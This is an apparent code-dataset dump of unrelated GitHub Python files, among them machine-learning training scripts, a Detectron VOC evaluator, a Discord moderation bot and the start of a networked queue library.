HttpResponse(answer)","repo_name":"JuanPabloGomezCristancho/Entrega-intermedia-del-proyecto-final---Coderhouse","sub_path":"blog_own/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4165072606","text":"import os\nos.system('cls') # on windows\nstring=input()\ncount=0\nfor i in range(0,len(string)):\n if string[i].isupper():\n count+=1\nif count> (len(string)-count):\n string=string.upper()\nelse:\n string=string.lower()\nprint(string)","repo_name":"Mohammad-P/Python","sub_path":"Maktab_beginner_Python/SE01/Upperletter.py","file_name":"Upperletter.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33232128459","text":"# -*- coding: utf-8 -*-\n\nALL_LABELS = 'bed bird cat dog down eight five four go happy house left marvin nine no off on one right seven sheila six stop three tree two up wow yes zero silence unknown'.split()\nTASK_LABELS = 'yes no up down left right on off stop go silence unknown'.split()\n\nL = 16000\nLABELS = TASK_LABELS\nid2name = {i: name for i, name in enumerate(LABELS)}\nname2id = {name: i for i, name in id2name.items()}\n\nms_to_s = 1000.0\nframe_size = int((20 / ms_to_s) * L) # 320\nstride_size = int((6.25 / ms_to_s) * L) # 100\nstrides = int(L / stride_size) # 160\n","repo_name":"senior-sigan/kaggle_speech_recognition","sub_path":"src/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38687973086","text":"#!/usr/bin/env python3 \n\nfrom pwanalyzer import PwAnalyzer\n\nrodinia = PwAnalyzer( \n name = 'srad',\n src = ['srad.cpp'], \n compiler = 'g++',\n header = [],\n cflags = [], \n ldflags = [''], \n run_cmd = './srad 2048 2048 0 127 0 127 2 0.5 2')\n\n#rodinia.debug() \nrodinia.build() \nrodinia.run()\nrodinia.wait(3.0)\nrodinia.profile() \nrodinia.pwreport() \nrodinia.pwloops() \n","repo_name":"vitduck/PWAnalyzer","sub_path":"srad/ref_seq/pwa_srad.py","file_name":"pwa_srad.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70406586281","text":"class Setting():\n\n def __init__(self):\n \"\"\"这里存储了设置\"\"\"\n # 屏幕设置\n self.screen_width = 1000\n self.screen_height = 800\n self.bg = (195, 195, 195)\n self.little_ship_speed = 2.3\n # 子弹设置\n self.bullet_width = 15\n self.bullet_height = 5\n self.bullet_speed_factor = 1.8\n self.bullet_color = 102, 102, 102\n # 方块速度\n self.rect_speed = 1\n self.rect_direction = 1\n","repo_name":"RyanLin1995/python","sub_path":"PythonLearning/小游戏/little_ship/little_ship_setting.py","file_name":"little_ship_setting.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5755389945","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nA restricted Cannon model where bounds are placed on theta coefficients in order\nto make the model more physically realistic and limit information propagated\nthrough abundance correlations.\n\"\"\"\n\nfrom __future__ import (division, print_function, absolute_import,\n unicode_literals)\n\n__all__ = [\"RestrictedCannonModel\"]\n\nimport logging\nfrom .model import CannonModel\n\nlogger = logging.getLogger(__name__)\n\n\nclass RestrictedCannonModel(CannonModel):\n \"\"\"\n A model for The Cannon which includes L1 regularization, pixel censoring,\n and is capable of placing bounds on theta coefficients in order to make the\n model more physically realistic and limit information propagated through\n abundance correlations.\n\n :param training_set_labels:\n A set of objects with labels known to high fidelity. This can be \n given as a numpy structured array, or an astropy table.\n\n :param training_set_flux:\n An array of normalised fluxes for stars in the labelled set, given \n as shape `(num_stars, num_pixels)`. The `num_stars` should match the\n number of rows in `training_set_labels`.\n\n :param training_set_ivar:\n An array of inverse variances on the normalized fluxes for stars in \n the training set. The shape of the `training_set_ivar` array should\n match that of `training_set_flux`.\n\n :param vectorizer:\n A vectorizer to take input labels and produce a design matrix. This\n should be a sub-class of `vectorizer.BaseVectorizer`.\n\n :param dispersion: [optional]\n The dispersion values corresponding to the given pixels. If provided, \n this should have a size of `num_pixels`.\n \n :param regularization: [optional]\n The strength of the L1 regularization. This should either be `None`,\n a float-type value for single regularization strength for all pixels,\n or a float-like array of length `num_pixels`.\n\n :param censors: [optional]\n A dictionary containing label names as keys and boolean censoring\n masks as values.\n\n :param theta_bounds: [optional]\n A dictionary containing label names as keys and two-length tuples as\n values, indicating acceptable minimum and maximum values. Specify\n `None` to indicate no limit on a boundary.\n \"\"\"\n\n def __init__(self, training_set_labels, training_set_flux, training_set_ivar,\n vectorizer, dispersion=None, regularization=None, censors=None, \n theta_bounds=None, **kwargs):\n\n super(RestrictedCannonModel, self).__init__(training_set_labels,\n training_set_flux, training_set_ivar, vectorizer, \n dispersion=dispersion, regularization=regularization, \n censors=censors, **kwargs)\n\n self.theta_bounds = theta_bounds\n return None\n\n\n @property\n def theta_bounds(self):\n \"\"\" Return the boundaries placed on theta coefficients. \"\"\"\n return self._theta_bounds\n\n\n @theta_bounds.setter\n def theta_bounds(self, theta_bounds):\n \"\"\"\n Set lower and upper boundaries on specific theta coefficients.\n\n :param theta_bounds:\n A dictionary containing vectorizer terms as keys and two-length \n tuples as values, indicating acceptable minimum and maximum values. \n Specify `None` to indicate no limit on a boundary. For example:\n `theta_bounds={\"FE_H\": (None, 0), \"TEFF^3\": (None, None)}`\n \"\"\"\n theta_bounds = {} if theta_bounds is None else theta_bounds\n if isinstance(theta_bounds, dict):\n \n label_vector = self.vectorizer.human_readable_label_vector\n terms = label_vector.split(\" + \")\n checked_bounds = {}\n for term in theta_bounds.keys():\n bounds = theta_bounds[term]\n term = str(term)\n \n if term not in terms:\n logging.warn(\"Boundary on term '{}' ignored because it is \"\n \"not in the label vector: {}\".format(\n term, label_vector))\n else:\n if len(bounds) != 2:\n raise ValueError(\"bounds must be a two-length tuple\")\n if None not in bounds and bounds[1] < bounds[0]:\n raise ValueError(\"bounds must be in (min, max) order\")\n\n checked_bounds[term] = bounds\n\n self._theta_bounds = checked_bounds\n\n else:\n raise TypeError(\"theta_bounds must be a dictionary-like object\")\n\n\n\n def train(self, threads=None, op_kwds=None):\n \"\"\"\n Train the model.\n\n :param threads: [optional]\n The number of parallel threads to use.\n\n :param op_kwds:\n Keyword arguments to provide directly to the optimization function.\n\n :returns:\n A three-length tuple containing the spectral coefficients `theta`,\n the squared scatter term at each pixel `s2`, and metadata related to\n the training of each pixel.\n \"\"\"\n\n # Generate the optimization bounds based on self.theta_bounds.\n op_bounds = [self.theta_bounds.get(term, (None, None)) \\\n for term in self.vectorizer.human_readable_label_vector.split(\" + \")]\n\n kwds = dict(op_method=\"l_bfgs_b\", op_strict=False, op_kwds=(op_kwds or {}))\n kwds[\"op_kwds\"].update(bounds=op_bounds)\n \n return super(RestrictedCannonModel, self).train(threads=threads, **kwds)\n","repo_name":"andycasey/AnniesLasso","sub_path":"thecannon/restricted.py","file_name":"restricted.py","file_ext":"py","file_size_in_byte":5616,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"30993435146","text":"import discord\nfrom discord.ext import commands\nimport random\nfrom discord import Member\nfrom discord.ext.commands import has_permissions, MissingPermissions\n\nclient = commands.Bot(command_prefix='PUTYOURPREFIXHERE')\n\n@client.event\nasync def on_ready():\n await client.change_presence(activity=discord.Game('SETSTATUSHERE'))\n\n print('Connected to bot: {}'.format(client.user.name))\n print('Bot ID: {}'.format(client.user.id))\n\n\n@client.command()\nasync def ping(ctx):\n await ctx.send('Pong! {0}'.format(round(client.latency * 1000, 'ms')))\n\n\n@client.command()\n@commands.has_permissions(kick_members=True)\nasync def kick(ctx, member: discord.Member, *, reason=None):\n await member.kick(reason=reason)\n await ctx.send(f' user {member} has been kicked.')\n\n@client.command()\n@commands.has_permissions(kick_members=True)\nasync def mute(ctx, self, user: discord.Member, *, reason=None):\n await member.mute(reason=reason)\n await ctx.send(f' user {member} has been muted.')\n \n@client.command()\nasync def server(ctx):\n name = str(ctx.guild.name)\n description = str(ctx.guild.description)\n\n owner = str(ctx.guild.owner)\n id = str(ctx.guild.id)\n region = str(ctx.guild.region)\n memberCount = str(ctx.guild.member_count)\n\n icon = str(ctx.guild.icon_url)\n\n embed = discord.Embed(\n title=name + \" Server Information\",\n description=description,\n color=discord.Color.blue()\n )\n embed.set_thumbnail(url=icon)\n embed.add_field(name=\"Owner\", value=owner, inline=True)\n embed.add_field(name=\"Server ID\", value=id, inline=True)\n embed.add_field(name=\"Region\", value=region, inline=True)\n embed.add_field(name=\"Member Count\", value=memberCount, inline=True)\n\n await ctx.send(embed=embed)\n \n \n@client.command()\n@commands.has_permissions(ban_members=True)\nasync def unban(ctx, *, member):\n bannedUsers = await ctx.guild.bans()\n name, discriminator = member.split(\"#\")\n\n for ban in bannedUsers:\n user = ban.user\n\n if(user.name, user.discriminator) == (name, discriminator):\n await ctx.guild.unban(user)\n await ctx.send(f\"{user.mention} was unbanned.\")\n return\n\n\n@client.command()\n@commands.has_permissions(ban_members=True)\nasync def ban(ctx, member: discord.Member, *, reason=None):\n await member.ban(reason=reason)\n await ctx.send(f' user {member} has been banned.')\n\n\nclient.run('PUTTOKENHERE')\n","repo_name":"kenjipy/discord.Py-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71427175720","text":"import numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\nimport os\n\nimport matplotlib\n\nimport matplotlib.pyplot as plt\n\nfrom pandas.plotting import register_matplotlib_converters\n\nregister_matplotlib_converters()\n\n\n\nsub = None\n\nfor dirname, _, filenames in os.walk('/kaggle/input/subs20191106/'):\n\n for filename in filenames:\n\n filename = os.path.join(dirname, filename)\n\n print(filename)\n\n if sub is None:\n\n sub = pd.read_csv(filename)\n\n else:\n\n sub.meter_reading += pd.read_csv(filename, usecols=['meter_reading']).meter_reading\n\n sub.meter_reading = sub.meter_reading.clip(lower=0) / len(filenames)\n\n\n\nsub.describe()\n# prediction's log-log histogram:\n\nax = np.log1p(sub.meter_reading).hist(bins=100)\n\nax.set_yscale('log')\npath = '../input/clean-weather-data-eda'\n\nbuilding = pd.read_csv(f'{path}/building_metadata.csv.gz', dtype={'building_id':np.uint16, 'site_id':np.uint8})\ntrain = pd.read_csv(f'{path}/train.csv.gz', dtype={'building_id':np.uint16, 'meter':np.uint8}, parse_dates=['timestamp'])\n\ntrain = train.merge(building, on='building_id', how='left')\n\ntrain.head()\n# target's log-log histogram:\n\nax = np.log1p(train.meter_reading).hist(bins=100)\n\nax.set_yscale('log')\ntest = pd.read_csv(f'{path}/test.csv.gz', dtype={'building_id':np.uint16, 'meter':np.uint8}, parse_dates=['timestamp'])\n\ntest['meter_reading'] = sub.meter_reading\n\ntest = test.merge(building, on='building_id', how='left')\n\ntest.head()\nweather_trn = pd.read_csv(f'{path}/weather_train.csv.gz', parse_dates=['timestamp'],\n\n dtype={'site_id':np.uint8, 'air_temperature':np.float16},\n\n usecols=['site_id', 'timestamp', 'air_temperature'])\n\nweather_tst = pd.read_csv(f'{path}/weather_test.csv.gz', parse_dates=['timestamp'],\n\n dtype={'site_id':np.uint8, 'air_temperature':np.float16},\n\n usecols=['site_id', 'timestamp', 'air_temperature'])\n\ntrain = train.merge(weather_trn, on=['site_id', 'timestamp'], how='left')\n\ntest = test.merge(weather_tst, on=['site_id', 'timestamp'], how='left')\nbuilding_id = 1258\n\nmeter = 1 # pick a meter\n\n\n\ntrain_sample = train[(train['building_id'] == building_id) & (train['meter'] == meter)] # same train sample as above\n\ntest_sample = test[(test['building_id'] == building_id) & (test['meter'] == meter)] # and the same meter in the test set\n\n\n\nfig, ax = plt.subplots(figsize=(16,4))\n\nplt.title(f'Building {building_id} Meter {meter}')\n\nax.xaxis.set_tick_params(rotation=30, labelsize=10)\n\nax2 = ax.twinx()\n\n\n\n# plot training sample\n\ndates = matplotlib.dates.date2num(train_sample['timestamp'])\n\nax2.plot_date(dates, train_sample['meter_reading'], '-', label='train', alpha=0.8)\n\nax.plot_date(dates, train_sample['air_temperature'], '.', color='tab:cyan', label='air_temperature')\n\n\n\n# plot test sample\n\ndates = matplotlib.dates.date2num(test_sample['timestamp'])\n\nax2.plot_date(dates, test_sample['meter_reading'], '*', label='test', alpha=0.8)\n\nax.plot_date(dates, test_sample['air_temperature'], '.', color='tab:cyan', label='air_temperature')\n\n\n\nax.set_ylabel('air_temperature'); ax2.set_ylabel('meter_reading')\n\nax.legend(loc='upper left'); ax2.legend(loc='upper right')\nsub.to_csv(f'submission.csv', index=False, float_format='%g')","repo_name":"aorursy/new-nb-3","sub_path":"hmendonca_4-ashrae-blended.py","file_name":"hmendonca_4-ashrae-blended.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5866545953","text":"from tensorflow.python.keras.models import Sequential, Model\nfrom tensorflow.python.keras.layers import Dense, Input, Dropout, Flatten,Conv2D,LSTM\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler, MaxAbsScaler, RobustScaler, LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.python.keras.callbacks import EarlyStopping\nfrom sklearn.model_selection import GridSearchCV,RandomizedSearchCV\n\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\nimport numpy as np\nimport pandas as pd\n\n# 1. 데이터\n# 1.1 경로, 가져오기\npath='c:/study/_data/dacon_cal/'\nsave_path= 'c:/study/_save/dacon_cal/'\nsubmission = pd.read_csv(path+'sample_submission.csv')\n\ntrain_csv = pd.read_csv(path +'train.csv', index_col=0)\ntest_csv = pd.read_csv(path +'test.csv', index_col=0)\n\n# 1.2 확인사항\nprint(train_csv.shape, test_csv.shape)\n# (7500, 10) (7500, 9)\n\n# 1.3 결측지\n# print(train_csv.isnull().sum())\n# print(train_csv.info())\n\n# 1.4 라벨인코딩( object 에서 )\nle=LabelEncoder()\nfor i in train_csv.columns:\n if train_csv[i].dtype=='object':\n train_csv[i] = le.fit_transform(train_csv[i])\n test_csv[i] = le.fit_transform(test_csv[i])\n# print(len(train_csv.columns))\n# print('==============')\n# print(train_csv.info())\n# print('===================')\ntrain_csv=train_csv.dropna()\nprint(train_csv.shape)\n\n\n# 1.5 x, y 분리\nx = train_csv.drop(['Calories_Burned'], axis=1)\ny = train_csv['Calories_Burned']\n\nprint(x.shape,y.shape) #(7500, 9) (7500,)\n\n# 1.6 train, test 분리\nx_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=35468264, shuffle=True)\n\nprint(x_train.shape) #(6000, 9)\nprint(x_test.shape) #(1500, 9)\nprint(test_csv.shape) #(7500, 9)\n\n# 1.7 Scaler\nscaler = MinMaxScaler() # 여기서 어레이 형태로 해서 아래 리쉐잎때 변환안해줘도됨\nx_train = scaler.fit_transform(x_train)\nx_test = scaler.transform(x_test)\ntest_csv = scaler.transform(test_csv)\n\nprint(x_train)\n\n# 2. 모델구성\n# model = Sequential()\n# model.add(Dense(32, input_dim=8))\n# model.add(Dense(64))\n# model.add(Dense(64))\n# model.add(Dense(32))\n# model.add(Dense(8))\n# model.add(Dense(1))\n\nx_train= x_train.reshape(6000,9,1)\nx_test= x_test.reshape(1500,9,1)\ntest_csv = test_csv.reshape(7500,9,1) # test파일도 모델에서 돌려주니까 리쉐잎 해줘야됨.\n\n\nmodel = Sequential()\nmodel.add(LSTM(96,input_shape=(9,1),activation='linear',return_sequences=True))\nmodel.add(LSTM(86,input_shape=(9,1),activation='relu'))\nmodel.add(Dense(76,activation='selu'))\nmodel.add(Dense(66))\nmodel.add(Dense(56))\nmodel.add(Dropout(0.1))\nmodel.add(Dense(46))\nmodel.add(Dense(32,activation='relu'))\nmodel.add(Dense(1))\n\n# model = Sequential()\n# model.add(Conv2D(7,(2,1),input_shape=(8,1,1)))\n# model.add(Conv2D(8,(2,1),activation='relu'))\n# model.add(Flatten())\n# model.add(Dense(9,activation='relu'))\n# model.add(Dense(6))\n# model.add(Dense(1))\n\n# input1 = Input(shape=(78,))\n# dense1 = Dense(32)(input1)\n# drop1 = Dropout(0.2)(dense1)\n# dense2 = Dense(64, activation='relu')(drop1)\n# dense3 = Dense(64)(dense2)\n# dense4 = Dense(32,activation='relu')(dense3)\n# dense5 = Dense(35)(dense4)\n# drop2 = Dropout(0.2)(dense5)\n# output1 = Dense(1)(drop2)\n# model = Model(inputs=input1, outputs=output1)\n\n# 3. 컴파일, 훈련\nmodel.compile(loss='mse', optimizer='adam')\nes = EarlyStopping(monitor='val_loss', patience=300, verbose=1, mode='min', restore_best_weights=True)\nhist = model.fit(x_train, y_train, epochs=1000, batch_size=128, verbose=1, validation_split=0.1, callbacks=[es])\n\nmodel.save('./_save/kcal/kcal_save_model01.h5')\n\n# 4. 평가, 예측\nloss = model.evaluate(x_test, y_test)\nprint('loss : ', loss)\n\ny_predict = model.predict(x_test)\n\nr2 = r2_score(y_test, y_predict)\nprint('r2 : ', r2)\n\n# RMSE 함수 정의\ndef RMSE(y_test,y_pre):\n return np.sqrt(mean_squared_error(y_test,y_pre)) #정의\nrmse=RMSE(y_test,y_predict) #사용\nprint('RMSE :',rmse)\n\n# 4.1 내보내기\nimport datetime\ndate = datetime.datetime.now()\ndate = date.strftime('%m%d_%H%M%S')\n\n# Save submission file with timestamp\ndate = datetime.datetime.now()\ndate = date.strftime(\"%m%d_%H%M\")\nsubmission.to_csv(save_path + date + 'submission.csv', index=False)\n","repo_name":"mkim9002/AIA","sub_path":"keras/practice_dacon-cal11y.py","file_name":"practice_dacon-cal11y.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"35892022151","text":"import services\nfrom services.sizing.size_pattern_matcher import size_finder\n\n\ndef test_sizing():\n test_cases = (\n (\" Gillette Tıraş Bıçağı Yedek Mach 3 2'li fs335 \", (2, \"adet\")),\n (\" 2'li \", (2, \"adet\")),\n (\"dasd 10'lu \", (10, \"adet\")),\n (\"Pınar %60 Light Süt 1 L gfds\", (1000, \"ml\")),\n (\"Ph 3.8 200 Ml fasf\", (200, \"ml\")),\n (\"da 200 ml dasd\", (200, \"ml\")),\n (\"dasd 4 kg \", (4000, \"gr\")),\n (\"da 200 ml dasd\", (200, \"ml\")),\n (\"f54 8 yıkama \", (8, \"yıkama\")),\n (\"F20 200 ML dwa\", (200, \"ml\")),\n (\"2x200 ML afdas\", (400, \"ml\")),\n (\"dasd 4 x 200 ML 565dfds\", (800, \"ml\")),\n (\"2/1 360 ML ada\", (360, \"ml\")),\n (\" 0.75 L adfa\", (750, \"ml\")),\n (\"dasd 3 6.5 kg\", (6500, \"gr\")),\n (\"5 800 g\", (800, \"gr\")),\n (\"Persil Gülün Büyüsü 6 KG 40 Yıkama\", (40, \"yıkama\")),\n (\"aptamil 2 800 g\", (800, \"gr\")),\n (\"a Gazlı İçecek Portakal 1.75 L\", (1750, \"ml\")),\n (\"780GR 4 LÜ\", (780, \"gr\")),\n (\"dasd 4 LU 780 GR asasd\", (780, \"gr\")),\n (\"süt 1/1 litre sadsad\", (1000, \"ml\")),\n (\"coca cola 1 lt.light\", (1000, \"ml\")),\n (\"ULKER 117 175GR PETIBOR \", (175, \"gr\")),\n (\"5 800 gr. asdas\", (800, \"gr\")),\n (\" 0.75 L. adfa\", (750, \"ml\")),\n (\" 750 ml. adfa\", (750, \"ml\")),\n (\"30+ 50 ML\", (50, \"ml\")),\n )\n\n for case, answer in test_cases:\n clean_name = services.clean_string(case)\n result = size_finder.get_first_digits_unit(clean_name)\n try:\n assert answer == result\n except (AssertionError, AttributeError, IndexError, TypeError) as e:\n print(\"FAIL\", case)\n print(clean_name)\n print(\"expected\", answer)\n print(\"got\", result)\n print(e)\n\n\nif __name__ == \"__main__\":\n ...\n","repo_name":"selimslab/entrophy","sub_path":"services/sizing/test_sizing.py","file_name":"test_sizing.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29547027595","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport numpy as np\nimport os\nimport shutil\nimport uuid\n\nfrom detectron.core.config import cfg\nfrom detectron.datasets.dataset_catalog import get_devkit_dir\nfrom detectron.datasets.voc_eval import voc_eval\nfrom detectron.utils.io import save_object\n\nlogger = logging.getLogger(__name__)\n\n\ndef evaluate_boxes(\n json_dataset,\n all_boxes,\n output_dir,\n use_salt=True,\n cleanup=True,\n use_matlab=False\n):\n salt = '_{}'.format(str(uuid.uuid4())) if use_salt else ''\n filenames = _write_voc_results_files(json_dataset, all_boxes, salt)\n _do_python_eval(json_dataset, salt, output_dir)\n if use_matlab:\n _do_matlab_eval(json_dataset, salt, output_dir)\n if cleanup:\n for filename in filenames:\n shutil.copy(filename, output_dir)\n os.remove(filename)\n return None\n\n\ndef _write_voc_results_files(json_dataset, all_boxes, salt):\n filenames = []\n image_set_path = voc_info(json_dataset)['image_set_path']\n assert os.path.exists(image_set_path), \\\n 'Image set path does not exist: {}'.format(image_set_path)\n with open(image_set_path, 'r') as f:\n image_index = [x.strip() for x in f.readlines()]\n # Sanity check that order of images in json dataset matches order in the\n # image set\n roidb = json_dataset.get_roidb()\n for i, entry in enumerate(roidb):\n index = os.path.splitext(os.path.split(entry['image'])[1])[0]\n assert index == image_index[i]\n for cls_ind, cls in enumerate(json_dataset.classes):\n if cls == '__background__':\n continue\n logger.info('Writing VOC results for: {}'.format(cls))\n filename = _get_voc_results_file_template(json_dataset,\n salt).format(cls)\n filenames.append(filename)\n assert len(all_boxes[cls_ind]) == len(image_index)\n with open(filename, 'wt') as f:\n for im_ind, index in enumerate(image_index):\n dets = all_boxes[cls_ind][im_ind]\n if type(dets) == list:\n assert len(dets) == 0, \\\n 'dets should be numpy.ndarray or empty list'\n continue\n # the VOCdevkit expects 1-based indices\n for k in range(dets.shape[0]):\n f.write('{:s} {:.3f} {:.1f} {:.1f} {:.1f} {:.1f}\\n'.\n format(index, dets[k, -1],\n dets[k, 0] + 1, dets[k, 1] + 1,\n dets[k, 2] + 1, dets[k, 3] + 1))\n return filenames\n\n\ndef _get_voc_results_file_template(json_dataset, salt):\n info = voc_info(json_dataset)\n year = info['year']\n image_set = info['image_set']\n devkit_path = info['devkit_path']\n # VOCdevkit/results/VOC2007/Main/_det_test_aeroplane.txt\n filename = 'comp4' + salt + '_det_' + image_set + '_{:s}.txt'\n return os.path.join(devkit_path, 'results', 'VOC' + year, 'Main', filename)\n\n\ndef _do_python_eval(json_dataset, salt, output_dir='output'):\n info = voc_info(json_dataset)\n year = info['year']\n anno_path = info['anno_path']\n image_set_path = info['image_set_path']\n devkit_path = info['devkit_path']\n cachedir = os.path.join(devkit_path, 'annotations_cache')\n aps = []\n # The PASCAL VOC metric changed in 2010\n use_07_metric = True if int(year) < 2010 else False\n logger.info('VOC07 metric? ' + ('Yes' if use_07_metric else 'No'))\n if not os.path.isdir(output_dir):\n os.mkdir(output_dir)\n for _, cls in enumerate(json_dataset.classes):\n if cls == '__background__':\n continue\n filename = _get_voc_results_file_template(\n json_dataset, salt).format(cls)\n rec, prec, ap = voc_eval(\n filename, anno_path, image_set_path, cls, cachedir, ovthresh=0.5,\n use_07_metric=use_07_metric)\n aps += [ap]\n logger.info('AP for {} = {:.4f}'.format(cls, ap))\n res_file = os.path.join(output_dir, cls + '_pr.pkl')\n save_object({'rec': rec, 'prec': prec, 'ap': ap}, res_file)\n logger.info('Mean AP = {:.4f}'.format(np.mean(aps)))\n logger.info('~~~~~~~~')\n logger.info('Results:')\n for ap in aps:\n logger.info('{:.3f}'.format(ap))\n logger.info('{:.3f}'.format(np.mean(aps)))\n logger.info('~~~~~~~~')\n logger.info('')\n logger.info('----------------------------------------------------------')\n logger.info('Results computed with the **unofficial** Python eval code.')\n logger.info('Results should be very close to the official MATLAB code.')\n logger.info('Use `./tools/reval.py --matlab ...` for your paper.')\n logger.info('-- Thanks, The Management')\n logger.info('----------------------------------------------------------')\n\n\ndef _do_matlab_eval(json_dataset, salt, output_dir='output'):\n import subprocess\n logger.info('-----------------------------------------------------')\n logger.info('Computing results with the official MATLAB eval code.')\n logger.info('-----------------------------------------------------')\n info = voc_info(json_dataset)\n path = os.path.join(\n cfg.ROOT_DIR, 'detectron', 'datasets', 'VOCdevkit-matlab-wrapper')\n cmd = 'cd {} && '.format(path)\n cmd += '{:s} -nodisplay -nodesktop '.format(cfg.MATLAB)\n cmd += '-r \"dbstop if error; '\n cmd += 'voc_eval(\\'{:s}\\',\\'{:s}\\',\\'{:s}\\',\\'{:s}\\'); quit;\"' \\\n .format(info['devkit_path'], 'comp4' + salt, info['image_set'],\n output_dir)\n logger.info('Running:\\n{}'.format(cmd))\n subprocess.call(cmd, shell=True)\n\n\ndef voc_info(json_dataset):\n year = json_dataset.name[4:8]\n image_set = json_dataset.name[9:]\n devkit_path = get_devkit_dir(json_dataset.name)\n assert os.path.exists(devkit_path), \\\n 'Devkit directory {} not found'.format(devkit_path)\n anno_path = os.path.join(\n devkit_path, 'VOC' + year, 'Annotations', '{:s}.xml')\n image_set_path = os.path.join(\n devkit_path, 'VOC' + year, 'ImageSets', 'Main', image_set + '.txt')\n return dict(\n year=year,\n image_set=image_set,\n devkit_path=devkit_path,\n anno_path=anno_path,\n image_set_path=image_set_path)\n","repo_name":"facebookresearch/Detectron","sub_path":"detectron/datasets/voc_dataset_evaluator.py","file_name":"voc_dataset_evaluator.py","file_ext":"py","file_size_in_byte":6395,"program_lang":"python","lang":"en","doc_type":"code","stars":26012,"dataset":"github-code","pt":"18"} +{"seq_id":"8383092065","text":"from binascii import hexlify, rledecode_hqx, rlecode_hqx, unhexlify\nfrom copy import copy\nfrom enum import Enum\nfrom getopt import getopt\nfrom os import kill\nfrom socket import socket, AF_INET, SOCK_STREAM\nfrom socketserver import TCPServer, ThreadingMixIn, StreamRequestHandler\nfrom sqlite3 import connect, OperationalError, Row\nfrom ssl import wrap_socket, CERT_NONE, CERT_REQUIRED, PROTOCOL_TLSv1\nfrom struct import pack, unpack\nfrom sys import argv, exit\nfrom threading import Condition, Lock, RLock, Thread\nfrom time import sleep\nfrom traceback import format_exc, print_stack\nfrom uuid import uuid4\n\nfrom subprocess import Popen, STDOUT\ntry:\n from subprocess import CREATE_NEW_PROCESS_GROUP\n\n # DETACHED_PROCESS is a creation flag for Popen that can be imported from\n # the win32process module if pywin32 is installed, or manually defined\n DETACHED_PROCESS = 0x00000008\n\n WIN32_POPEN_FLAGS = DETACHED_PROCESS | CREATE_NEW_PROCESS_GROUP\nexcept:\n # running on non-Windows platform\n WIN32_POPEN_FLAGS = None\n\nDEFAULT_TCP_PORT = 9990\nDEFAULT_SSL_PORT = 9991\n\nDEFAULT_SSL_PEM_FILE = 'server.pem'\nDEFAULT_SSL_KEY_FILE = 'server.key'\n\n# sets buffer size for network reads\nMAX_BUF_LEN = 4096\n\n# superq network node supported commands\nSQNodeCmd = Enum('SQNodeCmd', 'superq_exists '\n 'superq_create '\n 'superq_read '\n 'superq_delete '\n 'superq_query '\n 'superqelem_exists '\n 'superqelem_create '\n 'superqelem_read '\n 'superqelem_update '\n 'superqelem_delete')\n\n# local process datastore serving either user program or network node\n_dataStore = None\n_dataStoreLock = Lock()\n\ndef shutdown():\n if _dataStore:\n _dataStore.shutdown()\n\ndef log(msg):\n with open('node.output', 'a') as f:\n f.write('\\n' + msg)\n\n# base superq exception\nclass SuperQEx(Exception):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\nclass NotImplemented(SuperQEx):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n \nclass DBExecError(SuperQEx):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\nclass MalformedNetworkRequest(SuperQEx):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\nclass MalformedNetworkResponse(SuperQEx):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\nclass SuperQEmpty(SuperQEx):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\nclass SuperQFull(SuperQEx):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\nclass ObjectNotRecognized(SuperQEx):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\n# simple linked list element. superqelem inherits from this\nclass LinkedListNode():\n def __init__(self):\n self.prev = None\n self.next = None\n\n# doubly-linked list implementation used by superq and superqelem\nclass LinkedList():\n def __init__(self, circular = False):\n self.head = None\n self.tail = None\n self.__count = 0\n\n # llist can iterate circularly\n self.circular = circular\n\n def __len__(self):\n return self.__count\n\n def __iter__(self):\n self.__next = self.head\n return self\n\n def __next__(self):\n returnObj = self.__next\n\n if returnObj is None:\n if self.circular:\n self.__next = self.head\n returnObj = self.__next\n else:\n raise StopIteration\n\n self.__next = returnObj.next\n\n return returnObj\n\n def __lookup(self, idx):\n # convert negative index to positive\n if idx < 0:\n idx += self.__count\n\n if idx < 0 or idx >= self.__count:\n raise IndexError('idx ({0}/{1}) out of range'.format(idx,\n len(self)))\n\n if self.__count == 0:\n return 